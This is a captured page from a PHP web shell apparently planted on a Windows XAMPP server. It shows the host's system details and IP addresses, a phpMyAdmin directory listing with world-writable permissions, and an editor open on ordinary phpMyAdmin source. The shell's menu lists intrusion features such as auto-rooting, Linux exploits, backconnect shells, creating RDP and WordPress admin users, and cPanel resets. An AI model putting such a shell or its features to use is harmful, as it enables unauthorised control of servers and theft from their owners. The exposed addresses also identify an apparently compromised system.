Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.17.165.196
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
libraries /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
Charsets
[ DIR ]
drwxrwxrwx
Command
[ DIR ]
drwxrwxrwx
Config
[ DIR ]
drwxrwxrwx
ConfigStorage
[ DIR ]
drwxrwxrwx
Controllers
[ DIR ]
drwxrwxrwx
Crypto
[ DIR ]
drwxrwxrwx
Database
[ DIR ]
drwxrwxrwx
Dbal
[ DIR ]
drwxrwxrwx
Display
[ DIR ]
drwxrwxrwx
Engines
[ DIR ]
drwxrwxrwx
Exceptions
[ DIR ]
drwxrwxrwx
Export
[ DIR ]
drwxrwxrwx
Gis
[ DIR ]
drwxrwxrwx
Html
[ DIR ]
drwxrwxrwx
Http
[ DIR ]
drwxrwxrwx
Image
[ DIR ]
drwxrwxrwx
Import
[ DIR ]
drwxrwxrwx
Navigation
[ DIR ]
drwxrwxrwx
Partitioning
[ DIR ]
drwxrwxrwx
Plugins
[ DIR ]
drwxrwxrwx
Properties
[ DIR ]
drwxrwxrwx
Providers
[ DIR ]
drwxrwxrwx
Query
[ DIR ]
drwxrwxrwx
Server
[ DIR ]
drwxrwxrwx
Setup
[ DIR ]
drwxrwxrwx
Table
[ DIR ]
drwxrwxrwx
Twig
[ DIR ]
drwxrwxrwx
Utils
[ DIR ]
drwxrwxrwx
WebAuthn
[ DIR ]
drwxrwxrwx
Advisor.php
12.32
KB
-rw-rw-rw-
Bookmark.php
9.19
KB
-rw-rw-rw-
BrowseForeigners.php
10.63
KB
-rw-rw-rw-
Cache.php
1.5
KB
-rw-rw-rw-
Charsets.php
6.82
KB
-rw-rw-rw-
CheckUserPrivileges.php
11.3
KB
-rw-rw-rw-
Common.php
19.4
KB
-rw-rw-rw-
Config.php
41.65
KB
-rw-rw-rw-
Console.php
3.25
KB
-rw-rw-rw-
Core.php
28.91
KB
-rw-rw-rw-
CreateAddField.php
15.83
KB
-rw-rw-rw-
DatabaseInterface.php
71.73
KB
-rw-rw-rw-
DbTableExists.php
2.86
KB
-rw-rw-rw-
Encoding.php
8.41
KB
-rw-rw-rw-
Error.php
13.63
KB
-rw-rw-rw-
ErrorHandler.php
18.63
KB
-rw-rw-rw-
ErrorReport.php
8.99
KB
-rw-rw-rw-
Export.php
45.7
KB
-rw-rw-rw-
FieldMetadata.php
11.11
KB
-rw-rw-rw-
File.php
19.75
KB
-rw-rw-rw-
FileListing.php
2.88
KB
-rw-rw-rw-
FlashMessages.php
1.22
KB
-rw-rw-rw-
Font.php
5.58
KB
-rw-rw-rw-
Footer.php
8.06
KB
-rw-rw-rw-
Git.php
18
KB
-rw-rw-rw-
Header.php
20
KB
-rw-rw-rw-
Import.php
48.72
KB
-rw-rw-rw-
Index.php
14.83
KB
-rw-rw-rw-
IndexColumn.php
4.75
KB
-rw-rw-rw-
InsertEdit.php
89.05
KB
-rw-rw-rw-
InternalRelations.php
17.31
KB
-rw-rw-rw-
IpAllowDeny.php
9.13
KB
-rw-rw-rw-
Language.php
4.47
KB
-rw-rw-rw-
LanguageManager.php
22.74
KB
-rw-rw-rw-
Linter.php
4.99
KB
-rw-rw-rw-
ListAbstract.php
1.67
KB
-rw-rw-rw-
ListDatabase.php
4.11
KB
-rw-rw-rw-
Logging.php
2.69
KB
-rw-rw-rw-
Menu.php
20.4
KB
-rw-rw-rw-
Message.php
18.68
KB
-rw-rw-rw-
Mime.php
918
B
-rw-rw-rw-
Normalization.php
41.53
KB
-rw-rw-rw-
OpenDocument.php
8.62
KB
-rw-rw-rw-
Operations.php
35.11
KB
-rw-rw-rw-
OutputBuffering.php
4.1
KB
-rw-rw-rw-
ParseAnalyze.php
2.34
KB
-rw-rw-rw-
Pdf.php
4.17
KB
-rw-rw-rw-
Plugins.php
21.83
KB
-rw-rw-rw-
Profiling.php
2.16
KB
-rw-rw-rw-
RecentFavoriteTable.php
11.44
KB
-rw-rw-rw-
Replication.php
4.81
KB
-rw-rw-rw-
ReplicationGui.php
21.24
KB
-rw-rw-rw-
ReplicationInfo.php
4.79
KB
-rw-rw-rw-
ResponseRenderer.php
13.5
KB
-rw-rw-rw-
Routing.php
6.55
KB
-rw-rw-rw-
Sanitize.php
11.98
KB
-rw-rw-rw-
SavedSearches.php
11.33
KB
-rw-rw-rw-
Scripts.php
3.74
KB
-rw-rw-rw-
Session.php
8.16
KB
-rw-rw-rw-
Sql.php
64.01
KB
-rw-rw-rw-
SqlQueryForm.php
6.74
KB
-rw-rw-rw-
StorageEngine.php
15.71
KB
-rw-rw-rw-
SystemDatabase.php
3.98
KB
-rw-rw-rw-
Table.php
90.33
KB
-rw-rw-rw-
Template.php
4.5
KB
-rw-rw-rw-
Theme.php
7.32
KB
-rw-rw-rw-
ThemeManager.php
7
KB
-rw-rw-rw-
Tracker.php
30.34
KB
-rw-rw-rw-
Tracking.php
36.11
KB
-rw-rw-rw-
Transformations.php
16.31
KB
-rw-rw-rw-
TwoFactor.php
7.49
KB
-rw-rw-rw-
Types.php
25.85
KB
-rw-rw-rw-
Url.php
10.61
KB
-rw-rw-rw-
UrlRedirector.php
1.74
KB
-rw-rw-rw-
UserPassword.php
6.86
KB
-rw-rw-rw-
UserPreferences.php
10.49
KB
-rw-rw-rw-
Util.php
86.45
KB
-rw-rw-rw-
Version.php
556
B
-rw-rw-rw-
VersionInformation.php
7.3
KB
-rw-rw-rw-
ZipExtension.php
10.33
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CheckUserPrivileges.php
<?php /** * Get user's global privileges and some db-specific privileges */ declare(strict_types=1); namespace PhpMyAdmin; use PhpMyAdmin\Query\Utilities; use PhpMyAdmin\Utils\SessionCache; use function mb_strpos; use function mb_substr; use function preg_match; use function preg_replace; use function str_contains; /** * PhpMyAdmin\CheckUserPrivileges class */ class CheckUserPrivileges { /** @var DatabaseInterface */ private $dbi; /** * @param DatabaseInterface $dbi DatabaseInterface object */ public function __construct(DatabaseInterface $dbi) { $this->dbi = $dbi; } /** * Extracts details from a result row of a SHOW GRANT query * * @param string $row grant row * * @return array */ public function getItemsFromShowGrantsRow(string $row): array { $dbNameOffset = mb_strpos($row, ' ON ') + 4; $tableNameEndOffset = mb_strpos($row, ' TO '); $tableNameStartOffset = false; $tableNameStartOffset2 = mb_strpos($row, '`.', $dbNameOffset); if ($tableNameStartOffset2 && $tableNameStartOffset2 < $tableNameEndOffset) { $tableNameStartOffset = $tableNameStartOffset2 + 1; } if ($tableNameStartOffset === false) { $tableNameStartOffset = mb_strpos($row, '.', $dbNameOffset); } $showGrantsDbName = mb_substr($row, $dbNameOffset, $tableNameStartOffset - $dbNameOffset); $showGrantsDbName = Util::unQuote($showGrantsDbName, '`'); $showGrantsString = mb_substr( $row, 6, mb_strpos($row, ' ON ') - 6 ); $showGrantsTableName = mb_substr( $row, $tableNameStartOffset + 1, $tableNameEndOffset - $tableNameStartOffset - 1 ); $showGrantsTableName = Util::unQuote($showGrantsTableName, '`'); return [ $showGrantsString, $showGrantsDbName, $showGrantsTableName, ]; } /** * Check if user has required privileges for * performing 'Adjust privileges' operations * * @param string $showGrantsString string containing grants for user * @param string $showGrantsDbName name of db extracted from grant string * @param string $showGrantsTableName name of table extracted from grant string */ public function checkRequiredPrivilegesForAdjust( string $showGrantsString, string $showGrantsDbName, string $showGrantsTableName ): void { // '... ALL PRIVILEGES ON *.* ...' OR '... ALL PRIVILEGES ON `mysql`.* ..' // OR // SELECT, INSERT, UPDATE, DELETE .... ON *.* OR `mysql`.* if ( $showGrantsString !== 'ALL' && $showGrantsString !== 'ALL PRIVILEGES' && (mb_strpos($showGrantsString, 'SELECT, INSERT, UPDATE, DELETE') === false) ) { return; } if ($showGrantsDbName === '*' && $showGrantsTableName === '*') { $GLOBALS['col_priv'] = true; $GLOBALS['db_priv'] = true; $GLOBALS['proc_priv'] = true; $GLOBALS['table_priv'] = true; if ($showGrantsString === 'ALL PRIVILEGES' || $showGrantsString === 'ALL') { $GLOBALS['is_reload_priv'] = true; } } // check for specific tables in `mysql` db // Ex. '... ALL PRIVILEGES on `mysql`.`columns_priv` .. ' if ($showGrantsDbName !== 'mysql') { return; } switch ($showGrantsTableName) { case 'columns_priv': $GLOBALS['col_priv'] = true; break; case 'db': $GLOBALS['db_priv'] = true; break; case 'procs_priv': $GLOBALS['proc_priv'] = true; break; case 'tables_priv': $GLOBALS['table_priv'] = true; break; case '*': $GLOBALS['col_priv'] = true; $GLOBALS['db_priv'] = true; $GLOBALS['proc_priv'] = true; $GLOBALS['table_priv'] = true; break; default: } } /** * sets privilege information extracted from SHOW GRANTS result * * Detection for some CREATE privilege. * * Since MySQL 4.1.2, we can easily detect current user's grants using $userlink * (no control user needed) and we don't have to try any other method for * detection * * @todo fix to get really all privileges, not only explicitly defined for this user * from MySQL manual: (https://dev.mysql.com/doc/refman/5.0/en/show-grants.html) * SHOW GRANTS displays only the privileges granted explicitly to the named * account. Other privileges might be available to the account, but they are not * displayed. For example, if an anonymous account exists, the named account * might be able to use its privileges, but SHOW GRANTS will not display them. */ private function analyseShowGrant(): void { if (SessionCache::has('is_create_db_priv')) { $GLOBALS['is_create_db_priv'] = SessionCache::get('is_create_db_priv'); $GLOBALS['is_reload_priv'] = SessionCache::get('is_reload_priv'); $GLOBALS['db_to_create'] = SessionCache::get('db_to_create'); $GLOBALS['dbs_where_create_table_allowed'] = SessionCache::get('dbs_where_create_table_allowed'); $GLOBALS['dbs_to_test'] = SessionCache::get('dbs_to_test'); $GLOBALS['db_priv'] = SessionCache::get('db_priv'); $GLOBALS['col_priv'] = SessionCache::get('col_priv'); $GLOBALS['table_priv'] = SessionCache::get('table_priv'); $GLOBALS['proc_priv'] = SessionCache::get('proc_priv'); return; } // defaults $GLOBALS['is_create_db_priv'] = false; $GLOBALS['is_reload_priv'] = false; $GLOBALS['db_to_create'] = ''; $GLOBALS['dbs_where_create_table_allowed'] = []; $GLOBALS['dbs_to_test'] = Utilities::getSystemSchemas(); $GLOBALS['proc_priv'] = false; $GLOBALS['db_priv'] = false; $GLOBALS['col_priv'] = false; $GLOBALS['table_priv'] = false; $showGrantsResult = $this->dbi->tryQuery('SHOW GRANTS'); if (! $showGrantsResult) { return; } $re0 = '(^|(\\\\\\\\)+|[^\\\\])'; // non-escaped wildcards $re1 = '(^|[^\\\\])(\\\)+'; // escaped wildcards while ($row = $showGrantsResult->fetchRow()) { [ $showGrantsString, $showGrantsDbName, $showGrantsTableName, ] = $this->getItemsFromShowGrantsRow($row[0]); if ($showGrantsDbName === '*') { if ($showGrantsString !== 'USAGE') { $GLOBALS['dbs_to_test'] = false; } } elseif ($GLOBALS['dbs_to_test'] !== false) { $GLOBALS['dbs_to_test'][] = $showGrantsDbName; } if (str_contains($showGrantsString, 'RELOAD')) { $GLOBALS['is_reload_priv'] = true; } // check for the required privileges for adjust $this->checkRequiredPrivilegesForAdjust($showGrantsString, $showGrantsDbName, $showGrantsTableName); /** * @todo if we find CREATE VIEW but not CREATE, do not offer * the create database dialog box */ if ( $showGrantsString !== 'ALL' && $showGrantsString !== 'ALL PRIVILEGES' && $showGrantsString !== 'CREATE' && ! str_contains($showGrantsString, 'CREATE,') ) { continue; } if ($showGrantsDbName === '*') { // a global CREATE privilege $GLOBALS['is_create_db_priv'] = true; $GLOBALS['is_reload_priv'] = true; $GLOBALS['db_to_create'] = ''; $GLOBALS['dbs_where_create_table_allowed'][] = '*'; // @todo we should not break here, cause GRANT ALL *.* // could be revoked by a later rule like GRANT SELECT ON db.* break; } // this array may contain wildcards $GLOBALS['dbs_where_create_table_allowed'][] = $showGrantsDbName; $dbNameToTest = Util::backquote($showGrantsDbName); if ($GLOBALS['is_create_db_priv']) { // no need for any more tests if we already know this continue; } // does this db exist? if ( (! preg_match('/' . $re0 . '%|_/', $showGrantsDbName) || preg_match('/\\\\%|\\\\_/', $showGrantsDbName)) && ($this->dbi->tryQuery( 'USE ' . preg_replace( '/' . $re1 . '(%|_)/', '\\1\\3', $dbNameToTest ) ) || mb_substr($this->dbi->getError(), 1, 4) == 1044) ) { continue; } /** * Do not handle the underscore wildcard * (this case must be rare anyway) */ $GLOBALS['db_to_create'] = preg_replace('/' . $re0 . '%/', '\\1', $showGrantsDbName); $GLOBALS['db_to_create'] = preg_replace('/' . $re1 . '(%|_)/', '\\1\\3', $GLOBALS['db_to_create']); $GLOBALS['is_create_db_priv'] = true; /** * @todo collect $GLOBALS['db_to_create'] into an array, * to display a drop-down in the "Create database" dialog */ // we don't break, we want all possible databases //break; } // must also cacheUnset() them in // PhpMyAdmin\Plugins\Auth\AuthenticationCookie SessionCache::set('is_create_db_priv', $GLOBALS['is_create_db_priv']); SessionCache::set('is_reload_priv', $GLOBALS['is_reload_priv']); SessionCache::set('db_to_create', $GLOBALS['db_to_create']); SessionCache::set('dbs_where_create_table_allowed', $GLOBALS['dbs_where_create_table_allowed']); SessionCache::set('dbs_to_test', $GLOBALS['dbs_to_test']); SessionCache::set('proc_priv', $GLOBALS['proc_priv']); SessionCache::set('table_priv', $GLOBALS['table_priv']); SessionCache::set('col_priv', $GLOBALS['col_priv']); SessionCache::set('db_priv', $GLOBALS['db_priv']); } /** * Get user's global privileges and some db-specific privileges */ public function getPrivileges(): void { $username = ''; $current = $this->dbi->getCurrentUserAndHost(); if (! empty($current)) { [$username] = $current; } // If MySQL is started with --skip-grant-tables if ($username === '') { $GLOBALS['is_create_db_priv'] = true; $GLOBALS['is_reload_priv'] = true; $GLOBALS['db_to_create'] = ''; $GLOBALS['dbs_where_create_table_allowed'] = ['*']; $GLOBALS['dbs_to_test'] = false; $GLOBALS['db_priv'] = true; $GLOBALS['col_priv'] = true; $GLOBALS['table_priv'] = true; $GLOBALS['proc_priv'] = true; return; } $this->analyseShowGrant(); } }
Close
